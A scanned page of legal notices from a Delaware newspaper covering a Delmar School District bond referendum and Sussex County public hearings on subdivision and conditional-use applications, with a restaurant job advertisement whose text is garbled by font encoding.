11/23/3tc PUBLIC HEARING The Town of Laurel, DELMAR SCHOOL DISTRICT SCHEDULES REFERENDUM The Delmar School District will hold a referendum on Tuesday, December 5, 2006 to seek voter approval to float bonds through the State of Delaware to continue the previously approved construction of six [6] additional middle school classrooms and two-thousand [2,000] additional square feet of cafeteria space. The additional monies appropriated and approved by the Delaware Legislature in June 2006 will be 80% funded by the State of Delaware. The 20% local share of $560,000 will be funded through bond sales for the school construction. THIS REFERENDUM DOES NOT INCREASE THE SCHOOL TAX RATE. In the six years since the construction of the 20 million dollar Delmar School District/Delmar Middle and Senior High School, the enrollment has climbed from under 700 students to 1070 in 2006, with increases anticipated in coming years. The additional space will greatly improve services and class enrollments. The election will be held in the Delmar District Board of Education Room with polls open from 12:00 noon until 9:00 p.m. If approved, planning will begin immediately, and construction is expected to start the following year. Voters may obtain absentee ballots by contacting the Department of Elections for Sussex County, 114 N. Race Street, Georgetown, DE 19947 [302]856-5367. Any resident of the Delmar, DE School District, eighteen years of age or older with proof of residency, may vote in the referendum. Voters, however, need not be registered to vote. Any questions concerning the referendum should be directed to the District Office. Informational meetings will be held at 7:00 pm in the auditorium of the Delmar Middle and Senior High School on Wednesday, November 15, 2006, and again, Wednesday, November 29, 2006. through the stimulation of private investment and community revitalization in areas of population out-migration or a stagnating or Laurel Town Hall, Laurel, Delaware on Monday, December 4, 2006 at 7:00 p.m. A status report for FY-06 will also be included. For more information contact William Lecates, Director of Community Development and Housing at 8557777. 11/23/1tc PUBLIC HEARING The Town of Greenwood, PAGE 35 Greenwood Town Hall, Greenwood, Delaware on Tuesday, December 5, 2006 at 7:00 p.m. A status report for FY-06 will also be included. For more information contact William Lecates, Director of Community Development and Housing at 855-7777. 11/23/1tc NOTICE OF PUBLIC HEARING NANTICOKE HUNDRED Subd. #2005-87 Notice is hereby given that the County Planning and Zoning Commission of Sussex County will hold a public hearing on Thursday evening, DECEMBER 21, 2006, in the County Council Chambers, Sussex County Administrative Building, Georgetown, Delaware, on the application of DERIC PARKER to consider the Subdivision of land in an AR-1 Agricultural Residential District in Nanticoke Hundred, Sussex County, by dividing 22.491 acres into 23 lots and a variance from the maximum allowed cul-de-sac length of 1,000 feet, located at the northeast corner of the intersection of Road 40, and Road 591. Planning and Zoning public hearings will begin at 6:00 P.M. Text and maps of this application may be examined by interested parties in the County Planning and Zoning Office, Sussex County Administrative Building, Georgetown, Delaware. If unable to attend the public hearing, written com- ments will be accepted but must be received prior to the public hearing. For additional information contact the Planning and Zoning Department at 302-855-7878. 11/23/1tc NOTICE OF PUBLIC HEARING Northwest Fork Hundred C/U #1676 NOTICE IS HEREBY GIVEN, that the County Planning and Zoning Commission of Sussex County will hold a public hearing on Thursday evening, DECEMBER 21, 2006, in the County Council Chambers, County Administrative Office Building, Georgetown, Delaware, on the application of PETER J. GOEBEL to consider the Conditional Use of land in an AR-1 Agricultural Residential District for retail crafts sales to be located on a certain parcel of land lying and being in Northwest Fork Hundred, Sussex County, containing 3.1469 acres, more or less, lying northeast of Route 404, 550 feet northwest of Route 18.. 11/23/1tc See LEGALS—page 36 Enjoy The STAR? Subscribe Today! 302-629-9788 6IWXEYVERX .EW -ANAGEMENT /PPORTUNITIES )TS .OT &AST &OOD )TS A .EW !TTITUDE #OME JOIN A COMPANY WHERE FAST DESCRIBES MORE THAN OUR SERVICE IT ALSO DESCRIBES YOUR CAREER ADVANCEMENT /UR GROWTH THROUGHOUT THE AREA HAS CREATED NEW OPPORTUNITIES 'ENERAL -ANAGERS 3ALARIED !SST -ANAGERS (OURLY WITH YEARS RESTAURANT MANAGEMENT EXPERIENCE WE ARE ./7 ()2).'
https://issuu.com/morningstarpublications/docs/november-23--2006
CC-MAIN-2017-04
refinedweb
26,894
65.32
Z3, The Word Problem, and Path Homotopy as Equality There’s a neat little trick I realized for encoding certain kinds of problems related to rewriting strings into Z3 somewhat elegantly. It’s very simple too. The Word Problem The word problem is figuring out if two strings can be made equal to each other with a pile of equations of substrings. It can be thought of in different ways and shows up in different domains. One way to talking about it is as figuring out equivalaence for a finite presentation of a monoid. A finite presentation gives generators a,b,c let’s say. The free monoid of these generators is just the strings you can make out these characters. The identity is the empty string and the monoid product is string concatenation. In a finite presentation, you also specify some equations like $ab=c$. Now it isn’t obvious when two strings are equal or not. There is however an obvious strategy to find equality. Just search. You can consider each string a node in a graph and each application of an equality somewhere in the string to be an edge on that graph. Keep trying equalities using Dijsktra’s algorithm, A* or what have you and then if you find a path connecting the two words, you proved equality. A more satisfactory solution is to use a completion algorithm like Knuth Bendix. If Knuth bendix succeeds (a big if), the problem is in some sense solved for all words on the system. The output of the algorithm is a set of rewrite rules that bring words to a canonical form. You can just canonize words and compare to determine equality or disequality. There are different approaches one might be inclined to take when modelling monoids in Z3. Z3 has a built in theory of strings, perhaps one could use arrays somehow, or one might axiomatize the theory directly using an uninterpeted sort like so. from z3 import * G = DeclareSort("G") e,a,b,c = Consts("e a b c", G) times = Function('*', G,G, G) monoid_axioms = [ ForAll([a], times(e,a) == a ), ForAll([a], times(a,e) == a ), ForAll([a,b,c] , times(a,times(b,c)) == times(times(a,b),c)) ] Axiomatizing the sort literally transcribes the axioms of a monoid. The thing that isn’t great about this is that the associativity law of the monoid is a derivation and you’re going to waste Z3’s energy on reasoning about trivial facts of associativity. It is preferable to have Z3 reason about something that is associative on the nose. Well, there is a neat trick. The big thing that is associative on the nose is function composition. Instead of representing monoid elements as objects $a : G$, we represent them by a partial application of the monoid product $\hat{a} : G \rightarrow G = a\cdot -$ . We can always turn this representation back by applying it to the identity of the monoid $e : G$. This representation is associative on the nose for Z3. We can make the presentation a little cuter to use by making a class that overloads multiplication and equality. Here we show a monoid generated by an element $a$ and with a quotienting equation $a^5 = a^2$. class Fun(): def __init__(self, f): self.f = f def __mul__(self,g): return Fun(lambda x : self.f(g(x))) def __eq__(self,g): G = DeclareSort("G") x = Const("x", G) return ForAll([x], self.f(x) == g(x)) def __call__(self,x): return self.f(x) def __pow__(self,n): if n == 0: return Fun(lambda x : x) return self * (self ** (n-1)) G = DeclareSort("G") a = Fun(Function("a", G, G)) axioms = [a ** 5 == a**2] s = Solver() s.add(axioms) s.add( Not( a**6 == a**3) ) # prove a**6 == a**3 s.check() Viewed through a certain light it is another manifestation of the ole Hughes List/Cayley representation/Yoneda lemma thing, the gift that keeps on giving. The basic idea is to partially apply append/multiply/compose. It turns out the be useful to do in pragmatic programming context so because then things are associated in one direction by default instead of dealing with all possible associations. Some associations are better than others computationally, or it’s nice to just have a canonical form as in this case. As it manifests in Z3, we represent monoid elements as single argument uninterpreted functions rather than as constants. This representation also shows up in explaining how string rewriting can be easily emulated by term rewriting. The standard recipe says to convert each symbol of the string system into a single argument term. $a \implies a(X)$. Then convert the string rewrite rule abc -> bc becomes the term rewriting rule $a(b(c(X))) \rightarrow b(c(X))$, which is the same as the above. Finitely Presented Categories This trick extends to categories. We can represent morphism equality checking of finitely presented categories in this style. The only change to the monoid case is that it seems conceptually cleaner that we want to make different Z3 sorts for the morphisms to go between, representing the objects of the category. This transformation is probably a manifestation of the Yoneda Embedding, by analogy to the other examples that I do somewhat understand. Here is a simple category with 2 objects, and generated by 2 morphisms $f : A \rightarrow B$ and $g : B \rightarrow A $ with the equation $f \cdot g \cdot f \cdot g = id$ # Hey Julia this time. Why not. using PyCall z3 = pyimport("z3") ob = [z3.DeclareSort("Hom(-,A)") , z3.DeclareSort("Hom(-,B)")] f = z3.Function("f", ob[1], ob[2]) g = z3.Function("g", ob[2], ob[1]) x = z3.Const("x", ob[2]) axiom = z3.ForAll([x], f(g(f(g(x)))) == x) # an equality over the morphism generators s = z3.Solver() s.add(axiom) s.add(z3.Not( g(f(g(f(g(x))))) == g(x) )) # example simple theorem s.check() Groups The trick can also extend to groups, although dealing with the inverse operation of the group ruins the cleanliness. For every group element we add, we also need to add its inverse and some axioms about its inverse. So it isn’t quite as clean as a monoid. class Fun(): def __init__(self, f, inv): self.f = f self.inv = inv def __mul__(self,g): return Fun(lambda x : self.f(g(x)), lambda x : g.inv(self.inv(x)) ) def __eq__(self,g): G = DeclareSort("G") x = Const("x", G) return And(ForAll([x], self.f(x) == g.f(x)), ForAll([x], self.inv(x) == g.inv(x))) def inv(self): return Fun( self.inv, self.f ) def __call__(self,x): return self.f(x) def __pow__(self,n): if n == 0: return self.id return self * (self ** (n-1)) def inv_axioms(self): G = DeclareSort("G") x = Const("x", G) return And(ForAll([x], self.f(self.inv(x)) == x), ForAll([x], self.inv(self.f(x)) == x) ) Fun.id = Fun(lambda x: x, lambda x: x) def GroupElem(name): return Fun(Function(name,G,G), Function(f"inv_{name}",G,G)) # Symmetric group N = 3 sigma = [GroupElem(i) for i in range(N)] axioms = [s.inv_axioms() for s in sigma] axioms += [ sigma[i]*sigma[i] == Fun.id for i in range(N) ]) ] # A braid group # A nice way to detangle knots with egg? N = 3 sigma = [GroupElem(f"sigma_{i}")for i in range(N)] axioms = [s.inv_axioms() for s in sigma]) ] Path Connectivity Here is another example where an encoding allows us to greatly change the ease with which Z3 handles a problem. This example feels a little different from the others, or is it? Naively one might try to encode path connectivity of two vertices using a predicate connected Point = DeclareSort("Point") connected = Function("connected", Point, Point, Bool) #This defines a predicate that says if a point is connected to another. axioms = [] #paths are invertible axioms += ForAll([x,y], path(a,b) == connected(b,a)) # transitivity axioms += ForAll([x,y,z], Implies( And(connected(x,y) , connected(y,z) ) , connected(x,z) )) # self paths. axioms += ForAll([x], connected(x,x)) Built in equality already has these properties though. Equality is backed by more or less a disjoint set data structure which is a very efficient way to calculate the connected sets of a graph. I can guarantee you that this formulation will work better. import networkx as nx G = nx.Graph() G.add_nodes(['a','b','c','d']) G.add_edges( [('a','b'), ('b','c'), ('c','d') ] ) G.connected_components Vertex = DeclareSort("Vertex") a,b,c,d = Consts("a b c d", Vertex) edges = [a == b, b == c, c == d] s = Solver() s.add(edges) s.add(a != d) s.check() # unsat means a and d are connected Path Homotopy The paths through the triangulation of a surface form a category with vertices as objects and paths as morphisms. Homotopically equivalent paths also form a category, a groupoid even. This is to the group example what the Category example was to the monoid. There is something very tickling about using Z3 equality to express homotopy equivalence. It is very vaguely reminiscent of things that occur Homotopy Type Theory, but I wouldn’t take that too seriously. Bits and Bobbles The underlying data structure here is the Egraph. Specializing EGraphs to single arguments terms might give something interesting. Also then we open up the ability to mix in Tries. How do you prove two things are not equal? Find a model? How to deal with higher homotopies? Does the existence of cubical type theory suggest in some sense that a data structure for binding forms (de bruijn perhaps ) is a useful but unexpected one for describing concrete homotopies on concrete triangulations. Using egg for braid groups. Braid groups have applications in topological quantum computation. Optimizer? 2-homotopies - horizontal and vertical composition. Talia Ringer and cubical type theory Gershom Bazerman and topology of rewrite systems Edit: Michael Misamore on twitter brings up an interesting application I was not aware of. Apparently the concept of homotopy is useful in concurrency theory. I don’t know if Z3 is useful here or not. String rewriting is the analog of find/replace in your text editor. It finds an exact match and will replace it. You can emulate a string rewriting system by putting the starting string into you text editor and iteratively applyying replace all Or you can run the following sed script. Term rewriting where the patterns are ground terms can be easily emulated by string rewriting. You can take any tree structure and flatten/serialize it via a traversal. So the difference is not so much terms vs strings as it is some kind of flexibility in the patterns. In some more global sense, they are both turing complete (right?) and are equivalent anyway, and yet I think it’s impossible to shake the sense that term rewriting is the more powerful system. Term and String systems are interrelated in interesting ways. Many term indexing structures are built by taking some kind of string indexing structure like a trie on flattened terms. Function composition is an associative operation “on the nose” in a way that many other definitions are not. By embedding your concept in terms of it, you get associativity for free. There’s something here that is prevalent in mathemtics. Hughes lists convert list to a functional form because different associations of list appending have different performance characteristics. By Preapplying append in the right way, you guarantee by construction and by the natural of function composition. The Cayley representation of a group is an example of a similar thing. The Yoneda representation of a category.
https://www.philipzucker.com/z3-and-the-word-problem/
CC-MAIN-2021-39
refinedweb
1,959
57.06
Hi, I'm new in c programming and I'm doing this problem where I basically have to program a calculator in c , the problem is it has to be able to handle large numbers in addition, subtraction, multiplication and division I already know I can't use int or long variables so I have to store numbers in arrays and then I have to deal with digits in arrays (adding individual digits of an array) and I would have to deal with carries as well. I wrote a code for a calculator but it doesn't handle large numbers so I didn't know should I actually post it here as it is unnecessary I think. (I can delete it if it's against the rules) I know the code for the large number calculator has to be completely different but if you could just give me a couple of hints on arrays and how to add digits from two arrays, how to handle carries and stuff like that, it would be greatly appreciated. And this is like only for addition so I'm afraid I still have a lot of work and questions to go.... Code: #include <stdio.h> #include <stdlib.h> #include <string.h> int main () { char line[80]; while (fgets(line, 80, stdin)) { int n; char* t = strtok(line, " \n"); char operator = t[0]; t = strtok(0, " \n"); n = atoi(t); t = strtok(0, " \n"); while (t) { int z = atoi(t); switch (operator) { case '+': n += z; break; case '*': n *= z; break; case '-': n -= z; break; case '/': n /= z; break; } t = strtok(0, " \n"); } fprintf(stdout, "%d\n", n); } return 0; }
http://cboard.cprogramming.com/c-programming/107097-c-calculator-printable-thread.html
CC-MAIN-2015-40
refinedweb
274
56.32
chun changPro Student 1,390 Points Is there a way to accept either one of different types for a argument? as title 3 Answers Erion Vlada13,496 Points I would simply not specify what data type I wanted in the route. This would therefore give me string values, from there simply use a try except to accept both ints and floats. Example: @app.route("/add/<num1>/<num2>") # NOTE: This gets the values as strings def add(num1, num2): num1 = getValue(num1) # Get int or float values for both num2 = getValue(num2) return "{} + {} = {}".format(num1, num2, num1 + num2) def getValue(string): try: return int(string) # Attempt to return int value of string except ValueError: # If getting int value failed, then get float value return float(string) Note: The getValue() function was created to demonstrate the logic separately but it could have been added within def add(num1, num2): ```. It is however cleaner and more importantly, reusable. chun changPro Student 1,390 Points I wonder if there is any way that we can use to specify num1 can be either int or float in a single route instead of repeat for several routes Andreas cormackPython Web Development Techdegree Graduate 31,267 Points do you mean pass different datatypes as arguments? python @app.route('/add/<int:num1>/<int:num2>') @app.route('/add/<int:num1>/<float:num2>') @app.route('/add/<float:num1>/<int:num2>') @app.route('/add/<float:num1>/<float:num2>') def add(num1,num2): return "{} + {} = {}".format(num1,num2,num1+num2)
https://teamtreehouse.com/community/is-there-a-way-to-accept-either-one-of-different-types-for-a-argument
CC-MAIN-2020-40
refinedweb
247
54.46
Design Guidelines, Managed code and the .NET Framework Krys and I had a great time at our precon yesterday… It was especially fun to give away copies of the Framework Design Guidelines book. Krys and I (and the great folks at AW) worked double time to get the book ready for the PDC. It was an amazing high for us to get to hold the first copy of the book at the PDC where we give out 300+ copies at our day long percon. I am told the full set of slides are available now on Commnet for those here at the PDC… I will try to get them posted for everyone else in the world next week. The feedback we got from the precon so far as been great… Here a couple of the post I saw… I am sure I missed some, please send me a link and I will blog it. Also, if you have not already, please do fill out the online eval form… At the very end of the day, Krys showed solution to the group exercise we did… I thought I’d include it here for your reference. Scenarios Send Text Message message.Body = “Welcome to the PDC!”; message.Cc.Add(“kcwalina@mmm”); message.Send(); Send message with attachement message.Attachements.Add(“picture.jpeg”); API Design public class EmailMessage { public EmailMessage(string from, params string[] to); public string From { get; set; } public Collection<string> To { get; } public Collection<string> Cc { get; } public Collection<string> Bcc { get; } public string Body { get; set; } public Collection<string> Attachments { get; } public void Send(); } Edit: Added a new link PingBack from
http://blogs.msdn.com/brada/archive/2005/09/13/465043.aspx
crawl-002
refinedweb
272
73.21
Attribute routing solves a lot of the problems of classic ASP.NET routing, which can get ungainly when there are many route handlers, or you have several REST services. Dino shows how to enable and use attribute routing in ASP.NET MVC Today we’re all used to software services exposed over HTTP. We also expect these services to be available as plain HTTP callable endpoints: no proxies and no special API to sit in between as a mediator. This was not always the case, as you may recall. When WCF Came on Stage In the Microsoft stack, at some point we’ve been given WCF as the framework to use to expose externally callable endpoints. WCF was a great platform: extensible, flexible, scalable and probably close to perfection. A few years later, though, some people raised the point that maybe WCF was a bit over-engineered and that what had to be made easier and faster for WCF to meet actual needs was just exposing HTTP callable endpoints. WCF was then topped with a long list of additional frameworks and starter kits to make programming HTTP endpoints easier. But easier coding doesn’t necessarily mean faster code. ASP.NET MVC was particularly welcome also because it features controllers that can return JSON or XML. In a nutshell, in ASP.NET MVC you can have HTTP services at sole cost of adding a new controller class or a specific method to an existing controller class. This has always worked since version 1 of the framework. Controllers are much easier to set up than a WCF service and run as fast as reasonably possible. So WCF was quickly restricted to where the transportation had to be TCP or MSMQ, but not so much with HTTP. Then It Came Web API Problem solved? You bet! Even though ASP.NET MVC works very well, it still leaves something to be desired. ASP.NET MVC is tied closely to the ASP.NET framework and IIS. Web API came out to turn the good things in ASP.NET MVC into a new framework for HTTP services. The Web API framework relies on a different runtime environment that is totally separated from that of ASP.NET MVC. The runtime environment is inevitably largely inspired by ASP.NET MVC but, overall, it looks more straight-to-the-point as it is expected to only serve data and not markup. Web API is close to its version 2 release. Version 2 is an evolutionary new release that enables and simplifies a few new features in Web API that were already available to ASP.NET MVC web developers. An example is external authentication now available through services such as Facebook and Google; another example is support for Cross-Origin Resource Sharing (CORS). Yet another example, and probably the most relevant, is attribute routing. From a technical perspective, attribute routing is nothing special. Overall, it is a powerful feature that is relatively easy to explain and understand. However, the most interesting aspect of attribute routing in Web API is the reason why it exists and the original ideas it is based on. Let’s just start from here. Routing and URL Templates Attribute routing is not a feature that Web API inherits from ASP.NET MVC. Quite the reverse, attribute routing comes from old-fashioned WCF Web HTTP binding. Routing has always been a constituent part of ASP.NET MVC; attribute routing, instead, is a new variation of it. Classic routing, which is still available in ASP.NET MVC 5 and Web API 2, is based on conventions. In global.asax, at the startup of the application, you populate a system dictionary with routes and let the system live with all of them. Any time a request comes in, the URL is matched against the template of registered routes. If a match is found, the appropriate controller and action methods to serve the request are determined from the template. If not, the request is denied and the result is usually a 404 message. The code below is taken from the default Visual Studio ASP.NET MVC project and shows the suggested way to register routes. The RegisterRoutes method is invoked from within Application_Start in global.asax public static void RegisterRoutes(RouteCollection routes) { routes.IgnoreRoute("{resource}.axd/{*pathInfo}"); routes.MapRoute( name: "Default", url: "{controller}/{action}/{id}", defaults: new { controller = "Home", action = "Index", id = UrlParameter.Optional } ); } As a side-note, It also makes it easier for testing purposes to have a method prototyped just as RegisterRoutes. In a test you can call RegisterRoutes by passing a fake dictionary and then use the fake dictionary in the assertions. There is another aspect, called route recognition, that is significant for the evolution towards attribute routing. Route recognition works on a first-match basis. The most immediate consequence of first-match is that the order in which routes are registered is essential. Most specific routes should appear first in the list; catch-all and most generic routes should go to the bottom of the list. Why is this so significant? Well, in large applications, or even in medium-sized applications with a strong REST flavor, the number of routes may be quite large: and could easily be in the order of hundreds. If you’re a REST fanatic or if you’re just fussy about the URLs that your web application should support, then you may quickly find that classic routing becomes a bit overwhelming to handle. It can definitely become hard to determine the right order of more than 200 routes and you may find that infinite loops around regression are detected during automated tests or notified by users and testers. Attribute routing, which is coming in ASP.NET MVC 5 and Web API 2, offers a smoother way to handle routing. This is especially true when you want to force a particular syntax across all pages and, more likely, all the objects you expose. The Downside of Classic Routes A route is a plain parameterized string. You use names in curly brackets to define parameters and concatenate numbers, static text and parameters in a sequence that ultimately determines the URL. A route is always the same thing whether you call it a classic ASP.NET MVC-style route or an attribute route. The difference is all in how you use it and where you define it. A positive aspect of classic routes is that they are defined in a single place and work the same way regardless of the controller. Overall, you deal with one simple rule: any time a request is placed that matches any of the routes it is picked up. In addition, you can use constraints to restrict values in route parameters. So far so good. Now consider the following common example: orders/show/1 The purpose of the URL is fairly obvious: show me the order with an ID of 1. However, in doing so you are accepting a couple of conventions. First, you must have a class named OrdersController. Second, and more importantly, the OrdersController class must have a public method named Show which accepts an integer. In addition, you must find a way to handle the case in which the integer—the ID—is not provided but for some reasons the resulting URL is matched to the same route. Among other things, existing conventions open up to the risk of having non-action public methods on controller class. If you happen to have a public method that is not supposed to be callable from the outside you must explicitly opt it out of using the NonAction attribute, otherwise it will be processed anyway, thereby creating a potential security hole. There’s a way for developers to hide the name of the method from the URL. It requires a custom route handler, as below. public class OrdersRouteHandler : IRouteHandler { public IHttpHandler GetHttpHandler(RequestContext requestContext) { // Analyzes the actual URL being mapped to the route. If so, // programmatically determines controller/action if (requestContext.HttpContext.Request.Url.AbsolutePath.StartsWith("/orders/show/")) { requestContext.RouteData.Values["controller"] = "orders"; requestContext.RouteData.Values["action"] = "display"; } return new MvcHandler(requestContext); } } Within a custom route handler you can decide just about everything, including the real name of controller to be used and the action method. Unfortunately, a custom route handler is just added to the list of routes and you must find the right place for it. It’s no big deal as long as you have 10 routes; it starts getting a problem when you want to exercise a close control over too many individual routes. Here’s the code you need in order to add a route with a custom handler. var optionals = new RouteValueDictionary { { "controller", UrlParameter.Optional }, { "action", UrlParameter.Optional } }; routes.Add("CustomOrdersRoute", new Route("customordersroute", optionals, new OrdersRouteHandler())); Worse yet, when you have a long list of routes, each of which expresses a specific URL template, it is not unusual that you end up with many route handlers—nearly one per route. You understand that this is not particularly satisfactory. In the end, classic routes don’t lack any functionality; they’re simply hard to use when you’re fussy about URL templates. This is quite common in a REST-intensive design. Enter attribute routing. Attribute Routing in Action From the technical perspective, attribute routes are as easy as conventional routes except that they work better in a REST design. As their name may suggest, attribute routing is all about having a route attached, as an attribute, to a specific action method. [WebGet(UriTemplate="orders/{id}/show")] Order GetOrderById(int id); The code sets the method GetOrderById to be available over a HTTP GET call only if the URL template matches the specified pattern. The route parameter—the orderId token—must match one of the parameters defined in the method’s signature. There are a few more details to be discussed, but the gist of attribute routes is all here. There’s a clear resemblance with the now old-fashioned WCF Web HTTP programming model and the WebGet attribute in particular. [WebGet(UriTemplate="orders/{id}/show")]Order GetOrderById(int id); As I see things, attribute routing is just the revamped and extended version of routing as implemented in the WCF Web HTTP programming model. And, more importantly, it fits a specific requirement that programmers currently have. Enabling Attribute Routing Attribute routing is not enabled by default, but it can work side-by-side with conventional routing. Here’s the standard way to enable it: public static class WebApi2Config { public static void Setup(HttpConfiguration config) { config.MapHttpAttributeRoutes(); } } You don’t have to use a config class with static methods in pure MVC4 style; what really matters is that you invoke the new MapHttpAttributeRoutes method on the HttpConfiguration class. In case you intend to use the two types of routing together, it is preferable you give precedence to attribute routing. This means you call MapHttpAttributeRoutes before you start adding global routes. You can define a route via attribute for each method you like and also filter on the HTTP method used to call the action. In Web API 2, attribute classes like HttpGet, HttpPost, HttpPut and all others have been extended with an overload that accept a route URL template. If you like it better, you can also use the AcceptVerbs attribute, where the first parameter indicates the method name and the second parameter sets the route. [AcceptVerbs("GET", "orders/{id}/show")] You can use AcceptVerbs also for unsupported HTTP methods or perhaps WebDAV methods. Attribute Route Constraints Attribute routing also supports constraints on parameters using a slightly different syntax than classic routing. The API has a list of predefined constraints such as int, bool, alpha, min, max, length, minlength, range. Here’s how to use them: [HttpGet("orders/{id:int}/show"] The goal of constraints is straightforward. For more details, you can check out some documentation at. You can concatenate as many constraints as you wish and can create custom constraints as well. [HttpGet("orders/{id:int:range(1, 100)}/show"] To create a custom constraint you create a class that implements the IHttpRouteConstraint interface and use the following code to register it: var resolver = new DefaultInlineConstraintResolver(); resolver.ConstraintMap.Add("custom", typeof(YourCustomConstraint)); config.MapHttpAttributeRoutes(new HttpRouteBuilder(resolver)); The interface IHttpRouteConstraint has a single method named Match. Finally, you should note that each controller class can be decorated with a route prefix string in order to minimize the route string. When a route prefix is defined it is appended to any attribute routes before parsing. Here’s an example: [RoutePrefix("orders")] public class OrdersController : ApiController { [HttpGet("{id:int:range(1, 100)}/show }")] public Order GetOrderById(int id) { : } : } You can have multiple route prefixes for a controller; when this happens each route is evaluated individually in the order it appears until a match is found. Summary At every new build of ASP.NET MVC 5 and Web API 2, attribute routing gains in importance. It is likely to also end up making a debut in plain ASP.NET MVC. Attribute routing is not the type of feature that alone will push you to use Web API. However, it’s just one of those features that’s really nice to have.
https://www.simple-talk.com/dotnet/asp.net/attribute-routing-in-web-api-v2/
CC-MAIN-2015-35
refinedweb
2,204
55.24
Coping with Common Radiation Therapy Side Effects Because radiation therapy involves focusing strong beams of radioactive energy directly on the cancerous tumor and not throughout the body, most side effects occur in the immediate area where the radiation was directed. However, many cancer patients experience some level of overall fatigue, as well as skin irritation and hair loss at the treatment site. There are different types of radiation therapy. Some are administered from the outside and some are implanted inside the body. Also, the radioactive chemicals used can vary according to the treatment. Be sure to ask your doctor what type of side effects you can expect from your particular type of radiation therapy. Fatigue as a result of radiation treatment Radiation-induced fatigue can range from mild to severe and may last for months after you’ve completed therapy. Some people never regain their pre-treatment energy levels. Fighting cancer is hard work and can take not only a physical toll, but an emotional one as well. You may find you need to reorganize your day. Do the most strenuous tasks early, while you still have some energy reserves. Ask friends or relatives to run errands or help with more physically demanding chores. Nap when you need to, drink lots of water, and eat energy-boosting, high-protein foods. If you’re normally a gym rat, you may find that you need to cut back on your exercise intensity. Consider yoga, t'ai chi, or walking. There’ll be time for treadmills and weight training when your treatment is done. Skin irritation from radiation Radiation therapy damages the skin where you’ve received treatment. This damage can cause your skin to look and feel sunburned, or to look darker than normal. Your skin can also itch, peel, swell, or develop ulcers. Although the irritation will heal a few weeks after therapy is through, it’s important to treat your skin gently while you’re undergoing radiation to prevent infection. Don’t rub or scratch your skin. Always blot your skin dry after you bathe. Don’t expose your skin to extreme conditions. Tepid and lukewarm are the watch words for air and water temperature. Keep the treatment area out of the sun. Tell your doctor about all the soap and skin care products you use and ask her which ones are safe during treatment. Also, if you normally shave or use a depilatory in the area being treated, ask if you can continue to do so. Hair loss following cancer treatment If you have hair at the site where you’re receiving radiation, you will probably lose it. Your hair will start to fall out a few weeks into your therapy. If you’re receiving high doses of radiation, your hair may not grow back. If your hair does return (usually within 6 months), it may not be the same color or texture as it was prior to treatment. Hair loss on the head can be camouflaged with wigs, hats, and turbans. Eyebrows and eyelashes can be created with eyebrow pencils and artificial eyelashes. Many cancer patients receive both chemotherapy and radiation. If you’re one of them, you also need to consider that you may experience additional side effects from the chemotherapy.
http://www.dummies.com/how-to/content/coping-with-common-radiation-therapy-side-effects.html
CC-MAIN-2013-20
refinedweb
544
64.61
Fabiano Sidler wrote .. > Hi folks! > > Just come back from holidays, I wanted to run a script with > mod_python. According to the logs, mod_python was successfully loaded > and my python module is getting imported, but the browser only > receives the script code instead of its output. As usually, my > .htaccess is fine: > > SetHandler python-program > PythonHandler mymodule > PythonDebug On > > There aren't no AllowOverride statements making the above settings > fail. Can someone help me to fix this weird behaviour? > Thank you in advance! If receiving script code, presuming you are using URL ending in 'mymodule.py'. Try the following. 1. Put a file hello.txt in the same directory with something in it and try and access it using URL ending in 'hello.txt' instead of 'mymodule.py'. If it returns the contents of that file, it probably isn't using mod_python at all. 2. Introduce a syntax error in your '.htaccess' file. Ie., add a line containing just 'XXX'. If accessing anything in that directory yields a 500 error, the '.htaccess' file is at least being consulted. If you don't get a 500 error, then main Apache configuration has been changed so as to disallow you to have a '.htaccess' file. The main Apache configuration does not probably have the required: AllowOverride FileInfo for that directory. 3. Add logging in your handler code to see if it truly is being loaded and run. Ie., from mod_python import apache apache.log_error("loading module") def handler(req): apache.log_error("running handler") .... 4. Ensure that your handler is not returning apache.DECLINED, which would mean that Apache falls back to serving up static file. Ie., your source code if the URL happened to match that. 5. Read: for other debugging hints and ideas. Graham
http://modpython.org/pipermail/mod_python/2006-January/019898.html
CC-MAIN-2018-39
refinedweb
292
69.07
12-26-2011 03:25 AM I intend to create a transparent login screen(the complete code is posted below). the code runs fine on OS5 and OS 6 devices, but on BB Torch-9810 (OS 7), the transparency is lost and replaced with white background. Does anybody have idea of how to create transparent screen in OS7?? The code is as follows: public class LoginPopupTestCopy extends MainScreen{ protected void applyTheme() { } public LoginPopupTestCopy(){ this.setBackground(BackgroundFactory.createSolidT LabelField title=new LabelField("Login", LabelField.NON_FOCUSABLE|Field.FIELD_HCENTER); Font font1=getFont().derive(Font.BOLD,9,Ui.UNITS_pt); title.setFont(font1); title.setMargin(100, 0, 0, 0); add(title); } } Following code is used to display this screen: UiApplication.getUiApplication().pushScreen(new LoginPopupTestCopy()); Solved! Go to Solution. 12-26-2011 03:29 AM 12-26-2011 03:47 AM Thanks @maadani for your reply. I tried pushglobalscreen(with all 3 possible flags) but there is no difference UiApplication.getUiApplication().pushGlobalScreen( 12-28-2011 05:12 AM I want to customize very first MainScreen of my Blackberry application as like small ticker screen. My aim is that the first MainScreen should be of size 320width,100height so when user launches the application then he will just see screen of size 320width and 100height (0,200,320,100) while remaining screen will be transparent and user will see other applications through transparent screen. i want something like BreakNews app ,very well-know blackberry app. 12-28-2011 05:49 AM 12-28-2011 07:41 AM 12-29-2011 05:42 AM 12-29-2011 05:55 AM I suggest you would take one step back. Try displaying a popup screen (not MainScreen) as a global screen and see if it is displayed with or without the background. If it works, try implementing your screen as a popup rather than a MainScreen. If not, post the results/errors that you get and we'll how to continue from there. E. 12-29-2011 06:21 AM 12-29-2011 06:40 AM
http://supportforums.blackberry.com/t5/Java-Development/createSolidTransparentBackground-not-working-on-OS-7/td-p/1475721
crawl-003
refinedweb
336
56.96
Tutorial How To Deploy a Django App on App Platform The author selected the Diversity in Tech Fund to receive a donation as part of the Write for DOnations program. Introduction Django is a powerful web framework that allows you to deploy your Python applications or websites. Django includes many features such as authentication, a custom database ORM (Object-Relational Mapper), and an extensible plugin architecture. Django simplifies the complexities of web development, allowing you to focus on writing code. In this tutorial, you’ll configure a Django project and deploy it to DigitalOcean’s App Platform using GitHub. Prerequisites To complete this tutorial, you’ll need: - A DigitalOcean account. - A GitHub account. - Python3 installed on your local machine. You can follow the following tutorials for installing Python on Windows, Mac, or Linux. - A text editor. You can use Visual Studio Code or your favorite text editor. Step 1 — Creating a Python Virtual Environment for your Project Before you get started, you need to set up our Python developer environment. You will install your Python requirements within a virtual environment for easier management. First, create a directory in your home directory that you can use to store all of your virtual environments: - mkdir ~/.venvs Now create your virtual environment using Python: - python3 -m venv ~/.venvs/django This will create a directory called django. You can do that by typing: - source 